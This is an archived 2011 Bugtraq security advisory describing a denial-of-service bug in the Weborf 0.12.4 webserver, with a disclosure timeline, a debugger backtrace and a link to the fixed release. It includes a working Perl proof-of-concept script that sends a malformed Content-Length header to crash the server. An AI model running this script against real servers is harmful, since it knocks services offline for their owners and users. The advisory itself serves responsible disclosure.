lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Fri, 4 Mar 2011 13:46:46 -0800
From: Rodrigo Escobar <ipax@...abs.com.br>
To: bugtraq@...urityfocus.com
Subject: [DCA-2011-0009] Weborf 0.12.4 Denial-of-Service

[Discussion]

- DcLabs Security Research Group advises about the following vulnerability(ies):

[Software]

- Weborf-0.12.4 (Denial-of-Service)

[Vendor Product Description]

- Weborf is a lightweight webserver designed to rapidly share
directories. Runs on POSIX systems.

- Source: http://galileo.dmi.unict.it/wiki/weborf/lib/exe/fetch.php?media=download:weborf_0.12.4.tar.gz

[Advisory Timeline]

- 01/27/2011 -> Advisory sent to vendor.
- 01/27/2011 -> Vendor response. (Requesting more information)
- 01/27/2011 -> Full debug analysis and exploit sent.
- 01/28/2011 -> Vendor response. (Acknowledged and fixed the bug)
- 03/04/2011 -> Advisory published.

[Bug Summary]

- Wrong parsing in Content-Length entity-header.

[Impact]

- Low

[Affected Version]

- 0.12.4
- Prior versions can also be affected but weren't tested.

[Bug Description and Proof of Concept]

- The webserver crashes due to an error when handling certain HTTP
fields. This could be exploited to terminate an affected server via
e.g. specially crafted HTTP headers containing wide characters.

(gdb) bt
#0  0xb7ec8bd1 in memcpy () from /lib/tls/i686/cmov/libc.so.6
#1  0x0804dec5 in get_param_value (
   http_param=0x805af95 "HTTP/1.1\r\nHost:
http://www.dclabs.com.br\r\nContent-Length0\r\n",
   parameter=0x804fe79 "Content-Length", buf=0xb3e46095 "", size=15,
param_len=14) at utils.c:281
#2  0x0804cfa1 in read_post_data (sock=0, connection_prop=0xb3e462f8,
read_b=0xb3e462d4) at instance.c:1173
#3  0x00000000 in ?? ()

[PoC]

# Weborf-0.12.4 (Denial of Service)
#!/usr/bin/perl
use IO::Socket;
        if (@ARGV < 1) {
                usage();
        }
        $ip     = $ARGV[0];
        $port   = $ARGV[1];
        print "[+] Sending request...\n";
        $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr =>
"$ip", PeerPort => "$port") || die "[-] Connection FAILED!\n";
        print $socket "GET http://www.dclabs.com.br HTTP/1.1\r\n";
        print $socket "Host: http://www.dclabs.com.br\r\n";
        print $socket "Content-Length0\r\n\r\n";
        sleep(1);
        close($socket);
        print "[+] Done!\n";

sub usage() {
        print "[-] Usage: <". $0 ."> <host> <port>\n";
        print "[-] Example: ". $0 ." 127.0.0.1 80\n";
        exit;
}

All flaws described here were discovered and researched by:
Rodrigo Escobar aka ipax.
DcLabs Security Research Group
ipax (at) dclabs <dot> com <dot> br

[Patch(s) / Workaround]

Upgrade to the latest version at:
http://galileo.dmi.unict.it/wiki/weborf/lib/exe/fetch.php?media=download:weborf_0.12.5.tar.gz

[Greetz]
DcLabs Security Research Group.

--
Rodrigo Escobar (ipax)
Pentester/Researcher Security Team @ DcLabs
http://www.dclabs.com.br

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ